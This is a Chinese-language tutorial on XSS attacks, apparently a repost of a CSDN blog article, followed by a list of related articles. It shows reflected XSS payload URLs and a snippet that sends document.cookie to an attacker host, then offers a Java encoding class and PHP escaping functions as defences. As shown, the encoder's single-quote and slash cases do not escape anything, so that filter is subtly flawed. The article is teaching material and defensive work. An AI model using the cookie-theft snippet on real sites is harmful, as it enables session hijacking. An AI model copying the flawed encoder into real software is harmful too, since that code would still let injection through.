概述

  XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器 执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列 表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实 施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨 大的,是web安全的头号大敌。

攻击的条件

实施XSS攻击需要具备两个条件:

  一、需要向web页面注入恶意代码;

  二、这些恶意代码能够被浏览器成功的执行。

看一下下面这个例子:

<div id="el" style="background:url('javascript:eval(document.getElementById("el").getAttribute("code")) ')"

        code="var a = document.createElement('a');

        a.innerHTML= '执行了恶意代码';document.body.appendChild(a);

        //这这里执行代码

        "></div>

这段代码在旧版的IE8和IE8以下的版本都是可以被执行的,火狐也能执行代码,但火狐对其禁止访问DOM对象,所以在火狐下执行将会看到控制里抛出异常:document is not defined (document是没有定义的)。

再来看一下面这段代码:

<div>

    <img src="/images/handler.ashx?id=<%= Request.QueryString["id"] %>" />

</div>

相信很多程序员都觉得这个代码很正常,其实这个代码就存在一个反射型的XSS攻击,假如输入下面的地址:

http://www.xxx.com/?id=" /><script>alert(/xss/)</script><br x="

最终反射出来的HTML代码:

    <div>

    <img src="/images/handler.ashx?id=" /><script>alert(/xss/)</script><br x="" />

    </div>

也许您会觉得把ValidateRequest设置为true或者保持默认值就能高枕无忧了,其实这种情况还可以输入下面的地址达到相同的攻击效果:

http://www.xxx.com/?id=xx" onerror="this.onload()" onload="alert(/xss/)" x="

根据XSS攻击的效果可以分为几种类型

第一、XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。

第二、XSS存储型攻击,恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性和持久性,比较常见场景是在博客,论坛等社交网站上,但OA系统,和CRM系统上也能看到它身影,比如:某CRM系统的客户投诉功能上存在XSS存储型漏洞,黑客提交了恶意攻击代码,当系统管理员查看投诉信息时恶意代码执行,窃取了客户的资料,然而管理员毫不知情,这就是典型的XSS存储型攻击。

XSS攻击能做些什么

1.窃取cookies,读取目标网站的cookie发送到黑客的服务器上,如下面的代码:

var i=document.createElement("img")

document.body.appendChild(i)

i.src = "http://www.hackerserver.com/?c=" + document.cookie

2.读取用户未公开的资料,如果:邮件列表或者内容、系统的客户资料,联系人列表等等,如代码:

解决方法

一种方法是在表单提交或者url参数传递前,对需要的参数进行过滤,请看如下XSS过滤工具类代码

 import java.net.URLEncoder;

 /**

  * 过滤非法字符工具类

  *

  */

 public class EncodeFilter {

     public static String encode(String input) {

         if (input == null) {

             return input;

         }

         StringBuilder sb = new StringBuilder(input.length());

         for (int i = 0, c = input.length(); i < c; i++) {

             char ch = input.charAt(i);

             switch (ch) {

                 case '&': sb.append("&amp;");

                     break;

                 case '<': sb.append("&lt;");

                     break;

                 case '>': sb.append("&gt;");

                     break;

                 case '"': sb.append("&quot;");

                     break;

                 case '\'': sb.append("'");

                     break;

                 case '/': sb.append("/");

                     break;

                 default: sb.append(ch);

             }

         }

         return sb.toString();

     }

     public static String encodeForJS(String input) {

         if (input == null) {

             return input;

         }

         StringBuilder sb = new StringBuilder(input.length());

         for (int i = 0, c = input.length(); i < c; i++) {

             char ch = input.charAt(i);

             if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' ||

                     ch >= '0' && ch <= '9' ||

                     ch == ',' || ch == '.' || ch == '_') {

                 sb.append(ch);

             } else {

                 String temp = Integer.toHexString(ch);

                 if (ch < 256) {

                     sb.append('\\').append('x');

                     if (temp.length() == 1) {

                         sb.append('0');

                     }

                     sb.append(temp.toLowerCase());

                 } else {

                     sb.append('\\').append('u');

                     for (int j = 0, d = 4 - temp.length(); j < d; j ++) {

                         sb.append('0');

                     }

                     sb.append(temp.toUpperCase());

                 }

             }

         }

         return sb.toString();

     }

     /**

      * css非法字符过滤

      * http://www.w3.org/TR/CSS21/syndata.html#escaped-characters

     */

     public static String encodeForCSS(String input) {

         if (input == null) {

             return input;

         }

         StringBuilder sb = new StringBuilder(input.length());

         for (int i = 0, c = input.length(); i < c; i++) {

             char ch = input.charAt(i);

             if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' ||

                     ch >= '0' && ch <= '9') {

                 sb.append(ch);

             } else {

                 sb.append('\\').append(Integer.toHexString(ch)).append(' ');

             }

         }

         return sb.toString();

     }

     /**

      * URL参数编码

      * http://en.wikipedia.org/wiki/Percent-encoding

      */

     public static String encodeURIComponent(String input) {

         return encodeURIComponent(input, "utf-8");

     }

     public static String encodeURIComponent(String input, String encoding) {

         if (input == null) {

             return input;

         }

         String result;

         try {

             result = URLEncoder.encode(input, encoding);

         } catch (Exception e) {

             result = "";

         }

         return result;

     }

     public static boolean isValidURL(String input) {

         if (input == null || input.length() < 8) {

             return false;

         }

         char ch0 = input.charAt(0);

         if (ch0 == 'h') {

             if (input.charAt(1) == 't' &&

                 input.charAt(2) == 't' &&

                 input.charAt(3) == 'p') {

                 char ch4 = input.charAt(4);

                 if (ch4 == ':') {

                     if (input.charAt(5) == '/' &&

                         input.charAt(6) == '/') {

                         return isValidURLChar(input, 7);

                     } else {

                         return false;

                     }

                 } else if (ch4 == 's') {

                     if (input.charAt(5) == ':' &&

                         input.charAt(6) == '/' &&

                         input.charAt(7) == '/') {

                         return isValidURLChar(input, 8);

                     } else {

                         return false;

                     }

                 } else {

                     return false;

                 }

             } else {

                 return false;

             }

         } else if (ch0 == 'f') {

             if( input.charAt(1) == 't' &&

                 input.charAt(2) == 'p' &&

                 input.charAt(3) == ':' &&

                 input.charAt(4) == '/' &&

                 input.charAt(5) == '/') {

                 return isValidURLChar(input, 6);

             } else {

                 return false;

             }

         }

         return false;

     }

     static boolean isValidURLChar(String url, int start) {

         for (int i = start, c = url.length(); i < c; i ++) {

             char ch = url.charAt(i);

             if (ch == '"' || ch == '\'') {

                 return false;

             }

         }

         return true;

     }

 }

二、 过滤用户输入的 检查用户输入的内容中是否有非法内容。如<>(尖括号)、”(引号)、 ‘(单引号)、%(百分比符号)、;(分号)、()(括号)、&(& 符号)、+(加号)等。、严格控制输出

可以利用下面这些函数对出现xss漏洞的参数进行过滤

1、htmlspecialchars() 函数,用于转义处理在页面上显示的文本。

2、htmlentities() 函数,用于转义处理在页面上显示的文本。

3、strip_tags() 函数,过滤掉输入、输出里面的恶意标签。

4、header() 函数,使用header("Content-type:application/json"); 用于控制 json 数据的头部,不用于浏览。

5、urlencode() 函数,用于输出处理字符型参数带入页面链接中。

6、intval() 函数用于处理数值型参数输出页面中。

7、自定义函数,在大多情况下,要使用一些常用的 html 标签,以美化页面显示,如留言、小纸条。那么在这样的情况下,要采用白名单的方法使用合法的标签显示,过滤掉非法的字符。

各语言示例:

  PHP的htmlentities()或是htmlspecialchars()。

   Python的cgi.escape()。

   ASP的Server.HTMLEncode()。

   ASP.NET的Server.HtmlEncode()或功能更强的Microsoft Anti-Cross Site Scripting Library

   Java的xssprotect(Open Source Library)。

   Node.js的node-validator。

原文:https://blog.csdn.net/qq_21956483/article/details/54377947

xss攻击原理与解决方法的更多相关文章

  1. 浅谈XSS攻击原理与解决方法

    概述 XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器 执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人 ...

  2. SYN 攻击原理及解决方法

    原理SYN foold攻击主要针对tcp通信三次握手期间做的手脚,所以要弄懂这个攻击的原理我们首先必须知道tcp三次握手的详细过程 由上图可知tcp三次握手顾名思义要经过三个步骤,这三个步骤分别是 客 ...

  3. XSS攻击原理、示例和防范措施

    XSS攻击 XSS(Cross-Site Scripting,跨站脚本)攻击历史悠久,是危害范围非常广的攻击方式. Cross-Site Stripting的缩写本应该是CSS,但是为了避免和Casc ...

  4. PHP 安全三板斧:过滤、验证和转义之转义篇 & Blade模板引擎避免XSS攻击原理探究

    PHP 转义 实现 把输出渲染成网页或API响应时,一定要转义输出,这也是一种防护措施,能避免渲染恶意代码,造成XSS攻击,还能防止应用的用户无意中执行恶意代码. 我们可以使用前面提到的 htmlen ...

  5. XSS漏洞攻击原理与解决办法

    转自:http://www.frostsky.com/2011/10/xss-hack/ 对于的用户输入中出现XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的.现在让我们来普 ...

  6. 155.XSS攻击原理

    XSS攻击: XSS(Cross Site Script)攻击叫做跨站脚本攻击,他的原理是用户使用具有XSS漏洞的网站的时候,向这个网站提交一些恶意代码,当用户在访问这个网站的某个页面的时候,这个恶意 ...

  7. CSRF攻击原理以及防御方法(写的很好)

    转载地址:http://www.phpddt.com/reprint/csrf.html        CSRF概念:CSRF跨站点请求伪造(Cross—Site Request Forgery),跟 ...

  8. CSRF 攻击原理和防御方法

    1. CSRF攻击原理 CSRF(Cross site request forgery),即跨站请求伪造.我们知道XSS是跨站脚本攻击,就是在用户的浏览器中执行攻击者的脚本,来获得其cookie等信息 ...

  9. XSS攻击原理及防御措施

    概述 XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器 执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列 表,然后向联系 ...

随机推荐

  1. config之安全(用户认证)

    config server 端: 配置账号密码: 那么config client如何连接带有认证的config server呢? 假设两个同时使用,属性的优先级比uri的优先级高.

  2. window10+Anaconda3-4.2+python3.5+Pycharm+清华镜像源安装

    window下对python3.5适用性比较好,Anaconda4.2里面包含了python3.5. https://mirrors.tuna.tsinghua.edu.cn/anaconda/arc ...

  3. Framingham风险评估

    Framingham风险评分: Framingham 心脏研究和其他流行病学队列研究改变了20世纪后半部分对疾病的关注点,即从治疗已经存在的心血管疾病到预防处于疾病危险的状态.该策略的关键因素是识别那 ...

  4. 拥抱Service Fabric —— 目录

    理解分布式 经典分布式系统设计 云时代分布式系统演进 Service Fabric基础概念 Node, Application, Service, Partition/Replicas Partiti ...

  5. Docker管理工具-Swarm

    一.Swarm介绍 Swarm是Docker公司在2014年12月初发布的一套较为简单的工具,用来管理Docker集群,它将一群Docker宿主机变成一个单一的,虚拟的主机.Swarm使用标准的Doc ...

  6. linux命令总结之traceroute命令

    通过traceroute我们可以知道信息从你的计算机到互联网另一端的主机是走的什么路径.当然每次数据包由某一同样的出发点(source)到达某一同样的目的地(destination)走的路径可能会不一 ...

  7. 《剑指offer》面试题39 二叉树的深度(java)

    摘要: 今天翻到了<剑指offer>面试题39,题目二中的解法二是在函数的参数列表中通过指针的方式进行传值,而java是没有指针的,所以函数要进行改造.然而我翻了下别人的java版本(我就 ...

  8. 算法进阶之Leetcode刷题记录

    目录 引言 题目 1.两数之和 题目 解题笔记 7.反转整数 题目 解题笔记 9.回文数 题目 解题笔记 13.罗马数字转整数 题目 解题笔记 14.最长公共前缀 题目 解题笔记 20.有效的括号 题 ...

  9. 二、Kafka基础实战:消费者和生产者实例

    一.Kafka消费者编程模型 1.分区消费模型 分区消费伪代码描述 main() 获取分区的size for index =0 to size create thread(or process) co ...

  10. Linux Ubuntu下安装配置mysql

    检查系统中是否已经安装了mysql: sudo netstat -tap | grep mysql 安装mysql: sudo apt-get install mysql-server sudo ap ...